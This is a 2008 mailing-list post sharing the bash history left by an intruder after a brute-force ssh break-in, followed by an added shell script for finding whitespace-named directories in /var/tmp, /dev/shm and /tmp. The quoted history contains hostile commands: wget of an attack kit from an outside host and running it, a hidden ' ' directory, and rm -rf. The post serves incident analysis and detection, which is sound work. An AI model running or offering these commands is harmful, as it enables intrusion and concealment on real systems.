[K12OSN] OT: Break-In report

Rob Owens rob.owens at biochemfluidics.com
Wed Jan 2 13:52:58 UTC 2008


I thought you guys might be interested in seeing the tracks of a 
computer break-in.  I won't say whose system it was (to protect the 
embarrassed), but the break-in was nothing but a brute-force ssh attempt 
at guessing usernames and passwords.  A regular user account was 
compromised and here is his bash history:

> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd " 
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan  (note: the hacked user account was "dan")
> top
> who
> exit

I particularly like the use of " " as a directory name.  Nice and 
invisible.  Also note that the invader put his files in two directories 
which have the "sticky" bit set:  /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch 
of port-scanning.  The OS is going to be re-installed anyway, just to be 
safe.

Are there any organizations out there that this should be reported to? 
(For instance, the way one might send reports to an antivirus group or a 
content filtering group).

-Rob
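
As an added example that is not part of Rob's post: the history above shows the intruder creating a directory literally named " " inside a world-writable, sticky-bit scratch directory, which `ls` output makes easy to overlook. The POSIX sh script below (written for this page, not something the original poster ran) checks each candidate directory for the sticky and world-writable bits and then lists direct children whose names consist only of spaces, tabs and dots, the two classic "invisible" name tricks (" " and "..."). The default directory list (/var/tmp, /dev/shm, /tmp) is an assumption; pass your own paths as arguments.

```sh
#!/bin/sh
# Added example: hunt for whitespace-only or dots-only entry names in the
# world-writable, sticky-bit directories that intruders use as scratch space.
# Assumptions: the directory list below is a guess; names with embedded
# newlines are not handled specially.

# True when the directory itself is sticky (01000) and world-writable (0002).
# -H follows a symlink given on the command line (e.g. /dev/shm -> /run/shm);
# -prune stops find from descending, so only the directory itself is tested.
is_sticky_world_writable() {
    [ -n "$(find -H "$1" -prune -type d -perm -1002 -print 2>/dev/null)" ]
}

# Print "<dir>/"<name>"" for every direct child of $1 whose name is made of
# nothing but spaces, tabs and dots. Three globs cover plain names, dotfiles
# (excluding . itself) and names starting with two dots (excluding ..).
hidden_names() {
    dir=$1
    for f in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        # An unmatched glob is returned literally; skip those.
        [ -e "$f" ] || [ -L "$f" ] || continue
        name=${f##*/}
        if [ -z "$(printf '%s' "$name" | tr -d ' \t.')" ]; then
            printf '%s/"%s"\n' "$dir" "$name"
        fi
    done
}

# Scan only the arguments that are sticky, world-writable directories;
# a mode-0755 home directory or /usr/bin is skipped.
scan_scratch_dirs() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        if is_sticky_world_writable "$d"; then
            hidden_names "$d"
        fi
    done
}

# Default target list is an assumption; override it on the command line.
if [ $# -eq 0 ]; then
    set -- /var/tmp /dev/shm /tmp
fi
scan_scratch_dirs "$@"
```

The script reports names only; it does not touch them. Inspect a hit with `ls -la -- "/var/tmp/ "` (note the quoting), and remember that an intruder who reaches this point may also have left processes running (`ps aux`, `ss -tlnp`), so a clean hit list does not by itself mean the host is clean.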